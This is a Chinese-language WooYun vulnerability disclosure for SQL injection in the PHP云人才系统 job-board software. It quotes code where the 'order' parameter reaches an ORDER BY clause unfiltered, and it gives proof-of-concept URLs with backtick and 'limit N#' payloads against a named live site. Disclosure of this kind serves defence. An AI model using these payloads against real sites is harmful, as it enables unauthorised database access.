当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089489

漏洞标题:PHP云人才系统(20141229)2处SQL注入

相关厂商:php云人才系统

漏洞作者: 龟兔赛跑

提交时间:2015-01-07 12:50

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-07: 细节已通知厂商并且等待厂商处理中
2015-01-11: 厂商已经确认,细节仅向厂商公开
2015-01-14: 细节向第三方安全合作伙伴开放
2015-03-07: 细节向核心白帽子及相关领域专家公开
2015-03-17: 细节向普通白帽子公开
2015-03-27: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

PHP云人才系统(20141229)二处隐蔽的SQL注入

详细说明:

PHP云人才系统二处SQL注入。
0x01: 问答首页
========================
URL为:

http://www.hr135.com/ask/index.php?order=add_time


其中参数order可以注入。
看看代码/include/libs/Smarty_Compiler.class.php:5330

5330  	function _complie_qlist_start($tag_args)
5331 {
5332 $paramer = $this->_parse_attrs($tag_args);
5333 $item = str_replace("'","",$paramer[item]);
5334 global $db,$db_config,$config;
5335 $path = dirname(dirname(dirname(__FILE__)));
5336 $ParamerArr = $this->GetSmarty($paramer,$_GET);
5337 $paramer = $ParamerArr[arr];
5338 $Purl = $ParamerArr[purl];
5339
5340 $where=1;
5341 //�����ֶ�Ĭ��Ϊ����ʱ��
5342 if($paramer[order]){
5343 if($paramer[order]=="addtime"){
5344 $paramer[order]="add_time";
5345 }
5346 if($paramer[order]=="answernum"){
5347 $paramer[order]="answer_num";
5348 }
5349 $order = " ORDER BY `".$paramer[order]."` desc";
5350 }else{
5351 $order = " ORDER BY `add_time` desc";
5352 }
5353 if($paramer[cid]){
5354 $where .=" and `cid`='".$paramer[cid]."'";
5355 }
5356 if($paramer[uid]){
5357 $where .=" and `uid`='".$_COOKIE[uid]."'";
5358 }
5359 if($paramer[recom]){//�Ƽ� �ֶ�
5360 $where .=" and `is_recom`='1'";
5361 }
5362 if($paramer[limit]){
5363 $limit=" limit ".$paramer[limit];
5364 }
5365 if($paramer[ispage]){
5366 $limit = $this->PageNav($paramer,$_GET,"question",$where,$Purl,"","2");
5367 //$limit = $this->PageNav($paramer,$_GET,"q_class",$where,$Purl,'','2');
5368 //$this->_tpl_vars["firmurl"] = $config['sy_weburl']."/index.php?m=question".$ParamerArr[firmurl];
5369 }
5370 $rs = $db->select_all("question",$where.$order.$limit);


里面的5349行将$paramer[order]带入了SQL,由于有``,但是addslashs不会修改`,所以可以注入`闭合原来SQL,然后插入SQL语句。
再看看调用的地方,/ask/model/index.class.php:26

26  	function index_action(){
27 $this->public_action();
28 $this->yunset("c","index");
29 $this->yunset("order",$_GET['order']);
30 $my_attention=$this->obj->DB_select_once("attention","`uid`='".$this->uid."' and `type`='1'","ids");
31 [email protected](',',rtrim($my_attention['ids'],","));
32 $this->seo('ask_index');
33 $this->yunset("my_atten",$my_atten);
34 $this->wenda_tpl('index');
35 }


$this->yunset("order",$_GET['order']);没有过滤order,传递给参数@order。
然后在模版里面template/ask/index.htm:15

15          {yun:}qlist item=qlist ispage=1 t_len=20 [email protected] limit=10{/yun}
16 <div class="answers_left_list">
17 <div class="answers_left_list_left">
18 <div class="answers_app_left" onmouseover="get_user_info('question_','{yun:}$qlist.id{/yun}','{yun:}$qlist.uid{/yun}','50');" onmouseout="hide_user_info('question_','{yun:}$qlist.id{/yun}')" id='question_{yun:}$qlist.id{/yun}' style=" cursor:pointer">
19 <img src="{yun:}$qlist.pic{/yun}" width="40" height="40" onerror="showImgDelay(this,'{yun:}$config.sy_weburl{/yun}/{yun:}$config.sy_friend_icon{/yun}',2);">
20 </div>
21 </div>


在第15行将@order传递给了_complie_qlist_start().

http://www.hr135.com/ask/index.php?order=add_time`

SQL出错没有任何数据

1.png


http://www.hr135.com/ask/index.php?order=add_time`%20limit%201%23

取一条数据:

2.png


http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23

取两条数据:

3.png


0x02: 找工作搜索页
========================
URL为:

http://www.hr135.com/index.php?m=com&order=id&c=search&keyword=a

order参数可以注入。

http://www.hr135.com/index.php?m=com&order=id`&c=search&keyword=a

SQL出错,没有数据

4.png


http://www.hr135.com/index.php?m=com&order=id%20limit%201%23&c=search&keyword=a

取一条数据:

5.png


http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a

取两天数据:

6.png


0x03: 招人才首页
========================
URL为:

http://www.hr135.com/index.php?m=user&order=status_time


其中参数order可以注入。

http://www.hr135.com/index.php?m=user&order=status_time`

SQL出错,没有数据:

7.png


http://www.hr135.com/index.php?m=user&order=status_time`%20limit%201%23

取一条数据:

8.png


http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23

取两条数据:

9.png

漏洞证明:

2.png


http://www.hr135.com/ask/index.php?order=add_time`%20limit%202%23

取两条数据:

3.png


5.png


http://www.hr135.com/index.php?m=com&order=id%20limit%202%23&c=search&keyword=a

取两天数据:

6.png


8.png


http://www.hr135.com/index.php?m=user&order=status_time`%20limit%202%23

取两条数据:

9.png

修复方案:

include/libs/Smarty_Compiler.class.php里面搜索一下ORDER BY,基本上搜出来的地方都需要过滤。

版权声明:转载请注明来源 龟兔赛跑@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-11 12:29

厂商回复:

感谢提供,我们会尽快修复!

最新状态:

暂无